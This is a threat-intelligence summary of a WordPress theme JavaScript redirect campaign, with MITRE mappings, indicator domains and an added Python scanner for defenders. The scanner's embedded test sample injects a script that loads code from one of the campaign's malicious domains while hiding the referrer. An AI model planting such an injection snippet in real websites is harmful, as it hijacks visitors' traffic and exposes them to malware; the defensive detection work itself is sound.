A recent security investigation revealed a malicious JavaScript injection affecting a WordPress website, causing unwanted redirects, damaging the site's reputation, and exposing visitors to further malicious activity. The infection, embedded in a theme file, used a two-stage redirection process to hijack website traffic.
Affected: WordPress websites, online users
Key points:
- Malicious JavaScript was injected into a WordPress theme, causing redirects to unauthorized third-party domains.
- The infection negatively impacted the website’s reputation and put users at risk of further malicious activity.
- The initial infection method was identified as JavaScript Injection targeting specific theme files.
- Attackers leveraged external script loading to create unnoticed malicious redirects.
- At least 31 other websites were identified as being infected during the investigation.
- Common vectors for infection included compromised admin accounts, outdated plugins/themes, and inadequate file permissions.
- The presence of malicious domains raised security alarms on VirusTotal.
- Regular security audits and strong password practices were recommended as preventive measures.
MITRE Techniques:
- Technique: T1203 – Exploit Public-Facing Application: JavaScript injection used to exploit vulnerabilities in WordPress themes.
- Technique: T1071 – Application Layer Protocol: The malicious script utilizes web traffic protocols to facilitate communication for the redirection process.
- Technique: T1036 – Masquerading: Malicious JavaScript disguised as legitimate code in a theme file.
- Technique: T1070 – Indicator Removal on Host: Attackers used obfuscation techniques such as 'noreferrer' to conceal the redirect source.
Indicators of Compromise:
- [Domain] awards2today[.]top
- [Domain] chilsihooveek[.]net
- [File Path] ./wp-content/themes/astor/public/js/site.js
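The following is an added triage script, not tooling from Sucuri or the original write-up, that shows how a defender could sweep a wp-content/themes tree for the indicators summarised above: the two defanged domains, the theme JavaScript path, and the generic behaviours the report describes (a dynamically created script element pointing at an external host, a location redirect, and a 'noreferrer' hint). The regular expressions and the scoring weights are assumptions for illustration, and the two embedded JavaScript samples are constructed to exercise the scanner, not the malware's real code.

```python
#!/usr/bin/env python3
"""Sweep WordPress theme JavaScript for redirect-malware indicators.

Added example for triage; the heuristics below are assumptions and will
also flag legitimate code, so results are leads for manual review.
"""
import re
from pathlib import Path

# Domains from the IoC list, kept defanged in source and normalised for matching.
DEFANGED_DOMAINS = ["awards2today[.]top", "chilsihooveek[.]net"]
KNOWN_BAD = {d.replace("[.]", ".") for d in DEFANGED_DOMAINS}

# Generic behaviour patterns (assumed heuristics, not taken from the report).
PATTERNS = {
    "known_domain": re.compile("|".join(re.escape(d) for d in KNOWN_BAD), re.I),
    "dynamic_script": re.compile(r"createElement\s*\(\s*['\"]script['\"]\s*\)", re.I),
    "location_redirect": re.compile(
        r"(?:window\.|document\.)?location(?:\.href)?\s*=|location\.replace\s*\(", re.I),
    "noreferrer": re.compile(r"no-?referrer", re.I),
}


def scan_text(source: str) -> set:
    """Return the names of every indicator that matches the given JS source."""
    return {name for name, rx in PATTERNS.items() if rx.search(source)}


def risk_score(findings: set) -> int:
    """Crude triage score: a known IoC domain is decisive (10 points); each
    generic behaviour adds 1 so that combinations rise to the top of the list."""
    score = 10 if "known_domain" in findings else 0
    score += sum(1 for f in ("dynamic_script", "location_redirect", "noreferrer")
                 if f in findings)
    return score


def scan_theme_dir(root) -> dict:
    """Walk a themes directory; map each suspicious JS file (POSIX relative path)
    to the set of indicators found in it. Files with no findings are omitted."""
    root = Path(root)
    results = {}
    for js in sorted(root.rglob("*.js")):
        findings = scan_text(js.read_text(errors="replace"))
        if findings:
            results[js.relative_to(root).as_posix()] = findings
    return results


# Constructed samples (not the real payload) to exercise the scanner.
SAMPLE_MALICIOUS = """
var s = document.createElement('script');
s.src = 'https://chilsihooveek.net/loader.js';
s.setAttribute('referrerpolicy', 'no-referrer');
document.head.appendChild(s);
"""
SAMPLE_BENIGN = (
    "document.addEventListener('DOMContentLoaded', "
    "function(){ console.log('ready'); });"
)


def demo_scan() -> dict:
    """Build a throwaway theme tree mirroring the reported file path, drop the
    constructed samples into it, and return the scan results."""
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        js_dir = Path(tmp) / "astor" / "public" / "js"
        js_dir.mkdir(parents=True)
        (js_dir / "site.js").write_text(SAMPLE_MALICIOUS)
        (js_dir / "app.js").write_text(SAMPLE_BENIGN)
        return scan_theme_dir(tmp)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    hits = scan_theme_dir(target) if target else demo_scan()
    for path, findings in sorted(hits.items(),
                                 key=lambda kv: risk_score(kv[1]), reverse=True):
        print(f"{risk_score(findings):3d}  {path}  {sorted(findings)}")
```

Run it with the path to wp-content/themes to triage a live site; with no argument it scans the embedded samples. A file that only trips one generic pattern is usually legitimate theme code, whereas a known IoC domain or the combination of dynamic script injection with a referrer-hiding hint is what merits pulling the file for review.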
Full Story: https://blog.sucuri.net/2025/03/cascading-redirects-unmasking-a-multi-site-javascript-malware-campaign.html